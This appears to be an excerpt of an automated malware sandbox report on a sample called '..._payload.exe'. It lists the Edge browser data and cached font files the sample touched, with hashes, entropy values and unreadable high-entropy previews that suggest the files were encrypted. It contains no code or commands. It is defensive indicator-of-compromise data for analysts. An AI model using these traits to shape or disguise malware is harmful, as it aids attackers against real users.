                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):904
                                                                                                                          Entropy (8bit):7.751993813973345
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2k3jcb2u/O8z+bhp8PY3GK/0/g1IjfQbD:2lh/ukhKM/g1ifKD
                                                                                                                          MD5:EB8F1AA5DE63C4F4C84B79D3DFA9BA50
                                                                                                                          SHA1:FC1839E795A889832E1D02239E60963547AD5263
                                                                                                                          SHA-256:3C309356CCE42CB8D286BDD634199D6E537DC258E93B92303AC43325DACB5E82
                                                                                                                          SHA-512:6BD0F126C3B08D92CEDAC5AE4525F0E0B06DD0FF370CB5A9536C28ADD97B32C26F34EB13CD04B81BC3820C6B6380348E51016DE8B8E309DDC704DF27002DAD59
                                                                                                                          Malicious:false
                                                                                                                          Preview:.f.5.&.....n.f.T(%......E...$.g......-.<1'..../..".H..8..J.!..n....%s...>]..-..\.u...q[...I.A.d.N.....f...A..H..k.\k>.W..,.s.f\....}..D*.....X..7......L..?.`W...o...t...[.~...];8-................&.#W.. .f...qr..K.g}U......7..6.l:.$;..."$....M......\...#..yV.x..z..!..-.9d...g...R...+e..}j..,.ta........o...lZ.....,....b...J2.Obn.xH.0..s.*._c...HRy;.3..O....IHB]..^.......)h.....w[...B...=?{..e^Z.@..u.$S..d....2.'.@&...`.t...T.Z.B~\ZWk...h\....P;.S .]..?.f<..8....]..c..H.1....=..A...(c....m^x....[..w<.kcF.L.Q.O.b........)... .n...R+..:D..;..Lb.zB,..e.D-'..e.1. ...u..(....AQ.../.T....Bhr6....U^....h|.d..y.p.<....9...lY......<4....\.W..]..u.....5]...f.q.Aj....eOp..LR.Mq..Mp^.D......9F.66K..N...d]*1.<...........E.Z..R....6f.J.....W....O.C.S.H..7....s..?&o\.U"..w..l..hX].E.WphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):490
                                                                                                                          Entropy (8bit):7.495311621100999
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:S6AiK6WOfsf+Oyd4AbaS/Rjh71VjI6eBmPq5bTcii9a:0iMfK4MRZpzqBmybD
                                                                                                                          MD5:DC6E5DFC6554EDC4C0C7845DC320C688
                                                                                                                          SHA1:7B1AFDA1F6A98586DC50EDD564386D8E64B57C30
                                                                                                                          SHA-256:A8256FA345AD6EEBDB7C9D4BE96EFD8A8CA061085D96544EF7FAE29870EE2448
                                                                                                                          SHA-512:60C2829533D16E1C92FF8C6894429C0F652CC1E4733238EC0423265C1EAE1BE1B4A3F03E36356AD446DFA98FF24578BFDB522FDEB2F5538D9E48E55BDAFC6EBA
                                                                                                                          Malicious:false
                                                                                                                          Preview:*...#hv.k..{..._...Sf.C.....V..AX....&..'.R.&...j"......Z...].....p...?..'B..9..'.0?....1W.=..f.U'O,......e..R6...... .j...$. ..\.,nR....=R^6..r..8Z...,.b..FE....o...J`.a...B1.!s[.g.8....P4v%..Us0..j..HG*....W..6..d..T+.H?....5......p...#",<D.J...f..j.?..../v.ZV.....z...........H?..@...i.x[.........) .+.f..-.{..5.@vZ.8....i>...q.V.n...B]m..,.+Y.w.!........'..=.......p......}>\.G0.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):374
                                                                                                                          Entropy (8bit):7.316091036511868
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:xrsfX6xIc9lnOMXGmFO9rQ2FGou/jTwEO0aV5320VFqRFfiNy68cRYbJq5PDTciD:F3xD9lOMXGm89rQyGlgEO0A00VFquDRx
                                                                                                                          MD5:29969423F22FE9DD7562028B6FC68A52
                                                                                                                          SHA1:EB5621026E6A62FA214A648E989638FD61529C5A
                                                                                                                          SHA-256:3FA095D1931CB270170897D7D5A6D17A4008963CFFE8AFAA533D89F04C1422EB
                                                                                                                          SHA-512:A1AD3915F2138D74537CF487BBAF3A066928DD3EE9EDD2376C37669B9623C4D5E7DA0399CDB1B7B62F9A7E00798F6906B1F16F845F3A2478C01B8E5E6188CDEA
                                                                                                                          Malicious:false
                                                                                                                          Preview:.On.!I...@......2.ms...u.Q.v5....%.B..Y..x.]!../..9.x^9..E.p.)"Hn N{2`Lw..p`.6P..YA..!'.cu.F.>......l..8I.....f....O .~.A~t .......>CD.]..m3.XV!K..:.].K..*....bA#..3.r.5E..m .h^=...GY.P...f..I...n.....CT"..{.J.f....<.&..D..D{(.........$4..T...RH1...?..._.?....2n.e..^..X.M........cphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):684
                                                                                                                          Entropy (8bit):7.617179270268432
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:k6vjtTVIPSH5vcNDu29apWhBZcDDZfyx1sYwd67iS8alRffNT/eGKnqLOe1E/JvN:9vjtTVIPSBOaya84DNVHUSalNf5/L5Ti
                                                                                                                          MD5:D81CA439AA8EE31CD4212F65AF416588
                                                                                                                          SHA1:9E0EB63C31BA9A5F7B4DD2F71CB91FFFD6A0B6BE
                                                                                                                          SHA-256:0E9259099875F1CF4050CB311432FDFA0BF7BCCF9FCCA2DC5CD6A9B9A6D9CB5E
                                                                                                                          SHA-512:99E1477E24057CDD1D5EB1A0CFCD97FAEDF7E323716124C8448741CB020089E7ED67A66D5A1DCE4F760319922797C6BB629A36615AE11C903D9BDCEC023CD089
                                                                                                                          Malicious:false
                                                                                                                          Preview:2023/D^......r_.s=.....RNgC.k.b...C{...".....,S.i.0f.-E)..-.V...G....L^.8'.ur.yJ..3#5.z.9`...9..LY.`?>.SKY...9.P.UB.Y..._F..[..Ca..LY._.5.H.7...6....{.9Ct>.f.../....`..b]A..)..h.|F......3k...lXxp.........L,VY.Yj...`h4Yp.2..x..cCH..>f..a{(....=-.....m.A.;C.J.`......J.1SJ...........S...&H.AZe..8K....H.&..t'.7lx.Xc......S...7...+~..w8..(`.:I|..B.......&}[+.^.3...C.)v-... _y.O.,o..@)...........%Y....9Ur...mh4...d.....<......I.s?.OkA;,...j.fg}.].I....ef'.zK.C....z .;.u"...K......+.1.._:K...PhR...`U..4....$~h.4...A.S.:.U.j$../If...s....U.JQ#`.r..N0...R.w..G6v.....zL.......ephJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):395
                                                                                                                          Entropy (8bit):7.422627634723295
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:SQX4RelYrG4ufmuryNKHix80zq5bTcii9a:ARQ7r6KCIbD
                                                                                                                          MD5:737BABD717DAD3AFBD092D80DB6DA711
                                                                                                                          SHA1:9408F253E7750FB3362FEDE6077BA22244492217
                                                                                                                          SHA-256:AED5ADF5D9BF2A3CD51F0C065308350E76F769CBBE3AB73369C68B75E74F3D7A
                                                                                                                          SHA-512:BE223FA9115C6BE1DE9C7BB79F951C0F4E713D0DC2C8D7FA5A6BB46AB90E326D19D6599759668C3CE97EC9F92ED93327D4BFE6C97B35899BDF9BDDEE5DAAF29A
                                                                                                                          Malicious:false
                                                                                                                          Preview:*...#..Q....@J..2......^...=,n.......9....'.....qL..M.VQ.a.k.-^.&.nTMU...._~..@...L.7.cq.S./8...o.8.(R.\..-...\.j....D....'...b..K.....*.3.....!_. ......K.Jk..].~B.c.S....f.tM.......S.+...K....Azm|........y..O.lj....9....q......b..D.j...)|. ..z...;j.eo..g.......d.VpxD#.aK.~S4P..^.`..]0=.....S..k45_sq./phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):129419
                                                                                                                          Entropy (8bit):7.998629846512819
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:3072:h7xR8lUydnM5FWTq8WgD+wXCHId4cQMQMr5mSQcmx0MMlb:ZxmlLMgKKdXCH0rocPb
                                                                                                                          MD5:0B700D92B65010EFE91134DA6A8A9B27
                                                                                                                          SHA1:8EEB6350765D792E3320D60B16EF4E4B30CB3F75
                                                                                                                          SHA-256:7B333E1949AF66B5BAB3F4CBEBB61F27498CDD67B8D0D813C34DF3E30B4C807D
                                                                                                                          SHA-512:561633099014C09D4E041D943AD8562FD0F5E7B1E733B3BAB29D38E61DAB1053F3E65EFA05BA74F990523AE9EC2C71D9AF2ADCC3D1A8B19E4BA11B5E25C0A4DC
                                                                                                                          Malicious:true
                                                                                                                          Preview:{.. `.1......M..u..bO7]...Z...d...r...B..P \.Lt.e.. .w..^'....7;.-....m.U.H.....v..@b.......I..l:71....a^h..-....n.9u=.p.l.n6.H...o;g.......&....M..V.4..)......`.+..=.... ...ga.G..v.......@...5n.....Z_...H.... !|..l.a..XC'.)4..@...0..I..0.yNF.d..c5.c..k...p..73..I...p...'.($.v.*.{...D..y.FI......^?..h.u.n.nt......|......mU..G ...:...~"...4....j.)t}Nu[W.Jm].-.n....yn.hP(.Z 6.....B..N.<..d.K.-k.j.M.NS>....6vn..&2c.a.M..F.T-L..IM.`"........q@.._..F..#...LJ4e...{.m[*.k..2K..3>...Q/...5@#.8..y.A....i."..T.\..?.E`.|.....=2.4/V.*.'......>..p...z...._.t.p..._t.p.X.y..0...'7b...7./.{|k..2....b.`Y.A).Ag...(1...@Q*..${.......9..9...~...s...Lr=........v.X.#@.d.,.m..a....#[...3Q.\..@....`{.=...?..n.B......|K...-r.B?...... ..J..@........._.....d.?|...f.$(P..i..m..Q.]... Mg.~.}.......T...KUy`.....).Qr.... .>r...y........!.:\6.gm....n...Z....V.....3..6...R.....j"B..Uyv..W...........\.l.].v.}r../W......*.7.e..V.S..rG(}.W...h..t6x.K...oM..Q.d.4...|.....*.A..[r.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\3\ListAll.Json

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):162608
                                                                                                                          Entropy (8bit):7.979150369891975
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:l+pDIGU+H6LZrnT2iUCQn9u3m0ygkBs/x8FU6/gmv8pHYGh:Y3U+HCG9ZE3m04s/h6xvk4Q
                                                                                                                          MD5:C5F3FE07D596BC0682950D4126078FF9
                                                                                                                          SHA1:BB04161CE6B7BA9A43FBC2EEFF021D6BE59915AC
                                                                                                                          SHA-256:090B55E5FDFD70BE66603F109D2AB200B7C19803C6ABAFCA037F101007515F12
                                                                                                                          SHA-512:85FE42BAEB4FCE778370A0D2A70CC62E7EDB60BC0420C571FEFC7E80ED81B99DA43C5B97D7676E24DF7C582E3AAA222B87B9A55C42FE6A68E9993DEF3DE5D5DE
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"Maj4.f.i...._.T.^...h?bOA.n.y.e.....S......2.kVK..a^...S......\..../.2-.AR.....~...K..!O......"N.8.-(.(.r*bn...8-Z.q.e*..]..O.5....L.......|.D.......SD......u. .T.`..r.:.tW....x..U.i.....Rc..Ge.Q+Br..Z=.....F......1..P..m..W.%p.....oS4.'<{.1A.V&l|.v.n.~.g..2.n....(M...;..O.....&."..9N..>c..|.........o h2M~....i4..$.:....yx...p..V....+.W1..j.,..yx..l&......x3..c....r$...Z..D..FPQ<...|@.a.t%..:....;.0...{....+ld.T.^..!..e.N@...r.q....h./.....U....+(V.j.#...\x.I.#b.s/4.~....C.._.1.GX....K..*.).....-.K......5.Y...d.u.._.6{.q..I.+....P.Mno.:.q..Rk..".I....(-.s.$................?K]...v...M@,..x+.C....r......G...d..U$[.....|..=8i..z.^`*.M.....].1,.....3...H.a.h'.....6.....d...7..Zw.6!CAy.B..rbT.8.t..Hly.@..~3...h9..}.2I......L..........w.R....@..hO9n` .p.. ...7}zF[..y....,.h\-z....{........>).[...Z...: ....Y.w..A..}@t....'L.../J/.m...0.3.w.....b.N.A.=.x..O..u..S...0._.{ft.M.S.K.n..f.0.(..`.....g.R...bF.....N..(.i..x....O...v.. hb...t..bgHHf

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CatalogCacheMetaData.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2203
                                                                                                                          Entropy (8bit):7.914630780890162
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:YZHFReIgpZF+jXuF5c+LRrYFuItY1HSED:YNFkIcG7S5c+LZzImyQ
                                                                                                                          MD5:81E26A7BC73F09AB0DE8CE0020F3E9FC
                                                                                                                          SHA1:AEE16C9E522E667B4AC715D74485BCD71A3464AB
                                                                                                                          SHA-256:F1ABF631CE5C5F512ECFB634F8344DF9E4DAF39110E9B5CE6162A430E48BE516
                                                                                                                          SHA-512:800471675A9E123FA42F4111EF77FD20C6D165E12DED55CC7E5DAC442716F0DC0326FFCBC786B65BDE24230CA8211A615AA6816B1DF7601061D515D11FFFCD80
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlh.*.......I.].....nh.h...Q...y......V.^-..9.....r..x..=...".|....^..**B.26.:.1X>q.u....X.._..]D...I{.....(.11!.,z.IiWL.\$.z><g.......M.p........A.M..{wm....(.S..ao2....ze......N.F='Qr.9x...U...DB...X.....0?{ !...H3.s Y..H...Z.".p.C...eb...m.)..~.'...7..Or.>.-gd6F...:.[......QR...u....@s.gI..u.WP.._...e.A.k....?..-.5..=7[V`xWQ.7O...m......-...j.8...$l~.3..(...........m...$.FAi..W...r...Bo..;.w..4...1'....^.lG=.j.....].g......".n..o]...>..1h....i.O....R%.1..U....D.../..$..a.F..B........^.N...)......S.H..N.g...^I.<..-h.4?.V....W)....=...;..<.....U,I.5.r..I...R..%}..5..'"..1...q...(D........R.....ye.t..e7.v..F......b.}.hK.).,.NCo>R......ul...Wx?.Xv'.......... .........aV.4.;.....l......=..@.t."...:..8..j...s.sez..Y.|..M[+..~.)...9......L..u.[.w[.T.L.OZ/......=~2.zGslZ.S3..^i.!..}.r..cN..$.H...pR..p.Q.%.U....=G..3...s.1)........D......#.fm....g.FH..~2....+5..>.p@."Y....^!&..K....x^.:z..%=...hK...d.4...c@...O.;o....=,F......H".....#?.j..?.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\23001069669.ttf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):238254
                                                                                                                          Entropy (8bit):7.232503489306804
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:2pvmMn4AqtJozEZbUCL8NVG1HAaa/dIDiAW:2BmK4APzEZbzaRIDLW
                                                                                                                          MD5:B7E82FAD5AF96364EAD0A393E2252FEB
                                                                                                                          SHA1:CC40DC8655A1A77FB8CA30AD9E7EE6FB533AC8F9
                                                                                                                          SHA-256:D0DF5543BD5D323AF7BD34CA2531FEFEF5B22E56133832F2A0C9CF8705270514
                                                                                                                          SHA-512:3F1F9A297753DC63AF5B3D5B1770E1C4B61F8C54D5F7F86BDA991FD4B8286B84AC221921449218A263A4BB76C1323C9E7F1172081C7448830E09166092C093E8
                                                                                                                          Malicious:false
                                                                                                                          Preview:.....].V.,7.! ...d...wd.WN...J)...B.......^.;..>$.Q!.h..*:y..I....B.Kr.)...4.....A.3.?..1.....u....x.../.SV..P....W*.......).;.g....!.y.k.3o..6.E.iV....S{/....+..cS......a;drj....~...m5...!f..?._....w.&.BGi.\.@.Y.d-tI"..\...5..@.y.H.&d~W..V.3[FF....V.6yq..QG.&.LA........U/...9.....(..+J...{PN..P.].#@9..<g/M;.A.Y(....-...........0w...r|^=............d..m.I.jlMI.g...Hr...)k...A\'a0&...Zs.b...).s.s.9..P;....N[.;..... I.....1[v.G......P..vZ.Z....#((.5...Pw...P=*..L/..04..G0Jk......Aj.v9.$._......^.v.a3...5%,.c..D........zNUft9/.V..s.......9z..A.L..^..n7.gH..$us_*...+,.ibH..n........vFZ..x{sp....>.*;...*......!.E/..O.!O..(.%4.7....,.V.3..Cim.n.U.."..v...Z.&.~.q..:......su.......z..o.....`m.$g~.1a.d...c.g.f..$....l.z\A..Ng,s\/V..x....~...tL....x...|)....6[.....p...n......Z.....v^.p..s.y.%....f..&..;-...-.gm..]L.C..e7.pX.T..mC>.$|Q...OH...$..<>.T....Ixv,4o.QTp...R.-'..b1!..GR..i..A.m....8hY0.q.T..s.....hq.p......Y2HAC...s+."...S>e...{.@.J.!..j..Lj...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\28367963232.ttf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):240882
                                                                                                                          Entropy (8bit):7.263903332742867
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:lakEf228eyXCHMdHPcvPhoZv1U1DqYusEpI:sG28eyXtc3SZvOMa
                                                                                                                          MD5:C021AF8B6A7B0F0B20F4C1CC14AF18C5
                                                                                                                          SHA1:44ADD0083148132356EAA187320B7CE286C45FC2
                                                                                                                          SHA-256:D45C68E4C0359C37E2F5CDD44E00F92D4EFE8D4D61327D94F892771B989DCA1D
                                                                                                                          SHA-512:55ABA992F8EAA40C8AA3AA79FBD162F0C3FCBF9354A452665CAD6604A0B831DC2E0CD724886319CAC681DD81B4BEF2BBC9D73111E727C317DD261A8DB7B1AA9D
                                                                                                                          Malicious:false
                                                                                                                          Preview:......NE.7O.d.X...T..jj.....+.R...]Z.......C.H ...y...v....C.u.T..^.Y6.F.....<.f.....l....mL$.L.aY.......[oL.*..`..GA........S3...k/;Qk._....>0..~.Z..(...Y..9..2..E...c.....^.'.B.O.....O,4..<....k#Z.!U.1X...^AqhJ.<. .`..).c......".vHu.g$.{T.0....(.I.Au.Q..%..... .h.a0.C..}A.U.(-z.!.z."\..Z.....+J.....L#'...GRs..+..R..m.L.).$.(..G.`.Z.._...GJ..a......_.I....2.ED.o^9.K....1.L..K.O.S......VR..(...)...b...{...j..?.S....6T.t%.rL&.M..>..r..l.N..G......~......m+..}.h4.i....V.3.N......+$.QF...w:m..r......^S.j|.H+.A.....eJ.^...:.8.\u...H....A.k.V..t..n.tE..r.A.U....GtI.T..O.`6..1..x.......X'.~=........._..XK./.......:.w.'.?4d..x.?a..+...\.H...O)...7.y...RA...T^r|....<....IF(.zN....F...T....f\..F.-] .N>.....;&g..5dF.0..D....R1.(..X&gm.YN..y.CO.q..."..T...v=.g....;..U..L@S9..p_..9...l0PE'..t.Awm.$KB..H.Wj....7*.\...j.B........ .#.wE...(U....TU.A....F.......F......ww.f....."s.HO.GF....ov...C&.B....DV..\...J......s.*..i...E6...2...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\29442803203.ttf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):241750
                                                                                                                          Entropy (8bit):7.259398514374346
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:p8NjHR4WhGB0oDs2byJb3zUkZTTJJjyoUN3FoGANJ8rmEABdikLyB4YWVEsWTqPo:KjHrU032bOnUkNH2o38m30BVhsWSvq2w
                                                                                                                          MD5:5B64706B4FF248B7644B3C5071F7A8FA
                                                                                                                          SHA1:2F1E13C9388EA3942D9A5833BA75F730B81894F1
                                                                                                                          SHA-256:19B83382013DFF88F21FDB66F92F9D43DBB811DFB25B41FB61CCF83524C99175
                                                                                                                          SHA-512:3C9B8AA39CD62C72FA5D5EB8ACBCAB5F30E0345B30AC5DEA13405E3EAA2140B7CA8012BEB3477A3D1E2FACBA6C22191F4680EBEF5FA1325A6FFC8317AFE20061
                                                                                                                          Malicious:false
                                                                                                                          Preview:......G.7.........3.q.x...%..&..`..$.5...>.....B..Hh..B.i-u.sed9Z|.L...kg.;:...O.60%.S..H.fs.|.....d....b..h..ul..\_...c..E....H.....l`...86.$..,.........;...OA......+...P.....u...8.......B.L.g.....I..a...J.....\.#.m..=L...7...5C.....|..m.i.#/%|..)..u...#-/..............z.t..`..'...Y..a.....PQ....X.\......v4.).Fxu.L.J...k}..lm%.w..X 9..Q....S..J.(\.R.K.A.*~Z..q...1..tiq..[...M.]@.^.>4..._ZG*$.2!.'{.7i..._...k..6.0,..;..).]L.G...B..._.T!fUDz..`K...ZufB.9/(..." _....gO..sJ...Rt."B....j..u"..9.o..\....E.....{F...@.......KQ..ht.N..#.b.b7.Ac}.P.[../.:t.w.T.,...6..(cn......M..c..u..wC.U.....>...$..s..4.T..5.7...{$..n=.I..!....[.QI...).4...v.l..mhw...fq7w...wb|....L3n...Q.bUE....x..d|..B...v?Wb.SSW.Y.....H'.....]$.z...`....(T%q.i,..MTG@2eK}{..zN'.;..g.;.<..5z.E..W....s'c..$.5x=7....M%...C..IN....:6...9N.~.....DH.`~w]...e7T|.h....Y..Q..Q..Kpa^Z......Qu....:.jrCV>O...$'...nNa.9.+,Sr..}....?n&......-.G....C.......#.W-..y.:.[.U.+..K...h^.....Vp...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\30264859306.ttf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):238962
                                                                                                                          Entropy (8bit):7.232759797633507
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:OEDtP977xXt32RA+lW3AWQE9uxV1mo4O5GYBcxMvJxmPxBvdbVp+AxHvxbkjupAz:xDtpxxwHlKAWMxmoV9/mPxBvdb/tDpAz
                                                                                                                          MD5:54949850905E9F17E8F3D0597A3B1FE3
                                                                                                                          SHA1:EF949DEA7D3706CC377FD3841FA6C253A51A9E04
                                                                                                                          SHA-256:444C907FAF8DDD6B826D743D8DBB834743244DA8B0FC4CBA9147BF54FA1AD935
                                                                                                                          SHA-512:E2820CC99E73169A6EF1F0931C339D9F31A9DE3DD005A56FCC06B524D201F4826B36FDD681212ED8D2A52FD78AC74C0567CC8839BD2630C049ED968DD0FD9DB9
                                                                                                                          Malicious:false
                                                                                                                          Preview:.....pB...RL.*!H6&'..2Df7.J..\g....b...a.....I..@<.M.)A.L..'C.+Za.....|S;aJ.m.$...]......#....^..|..J.@..:Y..JvP...).5.<!..)fF..q.]r....;.>.6~..R.5".N+...f5.B.Nb+......8m[..%=..,.#.v4.ae;X...bF.R.yF.ia.N......G.t1j.m..O.......B...s.~... ,1./t..db.....(.zw...M_].......e.5..p...O,..l^.vV.)!....^.@...m. >L...={..n.}...=X.......%...K....6(.]E..A..I.B.4.~<).5.d..\Y.90iz...9A].2.+`]m..3.......8L........r...F5...cE.4...E[p....(.`8.S.C.s.g....Pd..9. ....$q.)I.......l...... E..U ..-S~..X..."....<k.....P.$q.#..[)VKN|..f.jZ.=..q......1...S..0...}.}...lx.H...r..c..^..J.k....8..9..R...B.nI.i.`...Oa.DU|ijV.Gu<...P....pl4a9...-I.k%.v....:.&."...9].S....G".....d,...F8.....::u.k.CU8.[C.Kf.o../|........sV.....K+.l...m!h.).f.z..${.........]/.3V%.e..Uw.lD......m..._z.u.d.c.<....1.-@Y.&..X.&......{.LK....;..@...........Y..C..Z...D.....2..eF.WX"]1K.}.g&...1g....l.....:*..9....W7...T..%h....Z..N...?......;.....n..Lc..i.j...>.P..>.@q..........eluE`R.j........I6`<......i

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\24153076628.ttf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):237902
                                                                                                                          Entropy (8bit):7.238602204673888
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:tdVDx2KmXZ5FVMmbwi7FwkNAy8zsuV4icB:Ptx2zXZ5Fm0vCkNmznV4jB
                                                                                                                          MD5:F521C31B921381BC39F093CFE0C88D40
                                                                                                                          SHA1:22E0BB5D1AE50834B30652977B7052E5D0FAA503
                                                                                                                          SHA-256:0FEFC8631FC5A946923E6A87F8BF997F2BB204F1631D4DCE3F11A050D5CAE8CF
                                                                                                                          SHA-512:6FCD3CEC17F8006B21D0917F1FAE15882C1F129C8A2FFF7BD6E5A02FA468C6DA96DD69A7CBA24030468913CCDEF8D99213C9A0FE3FB83F6FAD922E95A9A617F2
                                                                                                                          Malicious:false
                                                                                                                          Preview:......./....0..o..H..<.h..c9.a.A..cYv.d..<.~E)........L+...$.:$.x.,q..O.o.K..?....r.M[16a./]q.;.5G1...........}|`..Y.Tm..]..g(6...Sd.#.0.}S).x]?.../N-U...^T..m..9.......A.+....{/D..Uo...7R93..L)3.&...x..(*O.;......A....)X..........F..7..T.....D.q[.Z.o*...1z:&;.x.b:.E....?...{r/4.7..=..._.<W.......;.....a...|.DF......`.1y~.5...U..s.T.#..3..I.|?.i.Y.B..._}J@.......(...zS..T"....@......Li1..qb.9..../#.^L.D{,#.A...<..?.l......l....B ..2..B....s..#.A.Q.M)...5b...ND...+..._2.......+#.>V..MX> ..o&1..H...:.....(8..#..U...ow..f@.............bY1..N....v.......v&.>.X@^.+0..u.y.....+8.>..5....Y..GS....A. U...)QR"...=..nAi:9...UI..`QW..45.M.W.v4......@..@E..~...$..8...T...!@Q......AAT?...S...di..'.a#.v...oV.O..........".....ZsF.lf..8.C...rV.}..|.../...3h.,].u9D..2&#....&6...bCR......5..B5.&B........\ .soE...~...3(..r..5{=..A...n4..].v.....v....7......ts....L...i{....X...F./..p.3....a.. .qu/9w..JN....*..t...D.3u.x...H...Q=...8."..k(.....>..L.M.WCp.7j..Mx..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\30284701761.ttf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):241378
                                                                                                                          Entropy (8bit):7.258367231832209
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:KsXo36pz5CzMWDDqRYCNudKauOE72qoms/dogKSjIasMOphDtPcwBm:KSo2zyDuB0dvjE72qbs/dZjBgJtPcn
                                                                                                                          MD5:8214411ABBC4A3A0C475BEF65A440DA1
                                                                                                                          SHA1:E24A105E11208C2AF48E059952EDD815FF886DF5
